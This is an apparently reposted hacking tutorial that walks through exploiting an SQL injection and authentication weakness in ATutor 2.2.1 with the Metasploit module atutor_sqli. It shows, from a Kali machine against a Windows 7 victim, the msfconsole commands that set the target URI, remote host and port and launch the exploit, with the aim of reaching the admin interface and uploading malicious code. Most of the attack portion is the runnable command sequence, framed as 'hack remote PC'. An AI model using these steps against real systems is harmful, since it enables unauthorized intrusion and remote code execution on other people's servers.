Hack Remote PC using ATutor 2.2.1 SQL Injection / Remote Code Execution

Datetime:2016-08-23 00:16:18         Topic: SQL Injection          Share        Original >>
Here to See The Original Article!!!

This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.

  Exploit Targets

ATutor 2.2.1


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/atutor_sqli

msf exploit( atutor_sqli )> set targeturi /Atutor/

msf exploit( atutor_sqli )> set rhost (IP of Remote Host)

msf exploit( atutor_sqli )> set rport 80

msf exploit ( atutor_sqli )> exploit         


Put your ads here, just $200 per month.